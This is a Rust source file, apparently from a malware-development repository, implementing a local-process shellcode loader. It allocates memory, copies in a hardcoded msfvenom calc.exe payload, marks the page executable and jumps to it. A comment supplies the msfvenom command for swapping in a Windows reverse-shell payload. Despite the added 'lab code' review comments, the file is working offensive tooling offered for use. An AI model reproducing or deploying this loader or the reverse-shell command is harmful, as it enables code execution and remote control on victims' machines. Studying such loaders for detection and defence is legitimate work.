/*
CreateRemoteThread ShellCode Injection : LocalProcess
For more Codes: https://github.com/Whitecat18/Rust-for-Malware-Development.git
@5mukx
*/
use std::ptr::null_mut;
use winapi::um::memoryapi::{VirtualAlloc, VirtualProtect};
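/// Prints a success line prefixed with `\____[+]` to stdout.
///
/// Accepts either a bare message (`okey!("done")`) or a format string followed
/// by its arguments (`okey!("addr: {:?}", p)`); a trailing comma is tolerated.
/// The original pattern required at least one comma after the format string,
/// so a plain `okey!("msg")` did not match.
macro_rules! okey {
    ($msg:expr $(, $arg:expr)* $(,)?) => {
        println!("\\____[+] {}", format!($msg $(, $arg)*));
    };
}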
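/// Prints a failure line prefixed with `\____[-]`, then terminates the process.
///
/// Fixes two defects in the original: it exited with status 0 (callers and
/// scripts could not tell failure from success) and wrote the diagnostics to
/// stdout. It now exits with status 1 and writes to stderr. Same calling
/// forms as `okey!`: a bare message or a format string plus arguments.
macro_rules! error {
    ($msg:expr $(, $arg:expr)* $(,)?) => {{
        eprintln!("\\____[-] {}", format!($msg $(, $arg)*));
        eprintln!("Exiting ...");
        std::process::exit(1);
    }};
}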
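/// Local-process shellcode execution: allocate RW memory, copy the payload in,
/// flip the page to RWX, and call into it.
///
/// Lab code only: it executes raw bytes in the current process. Run it in an
/// isolated VM with a payload you generated yourself.
///
/// Changes vs. the original: the `VirtualProtect` result is now checked (the
/// original printed the BOOL and then jumped into the page regardless, which
/// faults if the protection change failed), the Win32 magic numbers are named
/// constants, and the dead commented-out byte dump is replaced by the
/// `msfvenom` command that regenerates it.
fn main() {
    // Win32 constants for VirtualAlloc / VirtualProtect (kernel32). Defined
    // locally so the call sites read without a lookup and no extra `use` is needed.
    const MEM_COMMIT: u32 = 0x1000;
    const PAGE_READWRITE: u32 = 0x04;
    const PAGE_EXECUTE_READWRITE: u32 = 0x40;

    // Alternative (reverse shell) payload — generate and paste in place of `buf`,
    // adjusting the array length to whatever msfvenom reports:
    //   msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=443 -f rust -b \x00\x0a\x0d

    // Testing payload from msf: the trailing bytes spell "calc.exe\0", so this
    // is the x64 calc-launching payload. Length must match exactly.
    let buf: [u8; 276] = [
        0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52,
        0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48,
        0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9,
        0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
        0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48,
        0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01,
        0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48,
        0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
        0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c,
        0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0,
        0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04,
        0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
        0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48,
        0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f,
        0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
        0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb,
        0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c,
        0x63, 0x2e, 0x65, 0x78, 0x65, 0x00,
    ];

    // SAFETY: everything below is either a raw Win32 FFI call or a pointer
    // operation on a region we allocated ourselves and sized by `buf.len()`;
    // the final call executes attacker-style bytes by design (lab code).
    unsafe {
        // 1. Commit a writable, not-yet-executable region for the payload.
        let exec = VirtualAlloc(null_mut(), buf.len(), MEM_COMMIT, PAGE_READWRITE);
        if exec.is_null() {
            error!("VirtualAlloc Error: {:?}", exec);
        }
        println!("| Executing SC in LocalProcess");
        okey!("VirtualAlloc : {:?}", exec);

        // 2. Copy the payload in while the page is still RW.
        std::ptr::copy_nonoverlapping(buf.as_ptr(), exec as *mut u8, buf.len());

        // 3. Make the page executable. VirtualProtect returns a BOOL (0 = failure);
        //    if it fails the page is still non-executable and calling into it
        //    would fault, so bail out rather than ignoring the result.
        let mut old_protect: u32 = 0;
        let protect_ok = VirtualProtect(
            exec,
            buf.len(),
            PAGE_EXECUTE_READWRITE,
            &mut old_protect,
        );
        if protect_ok == 0 {
            error!("VirtualProtect Error: returned {}", protect_ok);
        }
        okey!("VirtualProtect : {:?}", protect_ok);

        // 4. Reinterpret the buffer as a function pointer and call it. Control
        //    only returns here if the payload returns cleanly; an msf payload
        //    built with EXITFUNC=process terminates the process instead.
        //    NOTE(review): this assumes the payload behaves like an ABI-conforming
        //    function (callee-saved registers, stack) — not guaranteed for shellcode.
        let func: fn() = std::mem::transmute(exec);
        okey!("Executing Payload {}", "--->");
        func();

        // Housekeeping if the payload does return: drop RWX and release the page.
        // VirtualFree is not imported in this file; add it to the
        // `winapi::um::memoryapi` use line before enabling the second call.
        // VirtualProtect(exec, buf.len(), old_protect, &mut old_protect);
        // VirtualFree(exec, 0, MEM_RELEASE);
    }
}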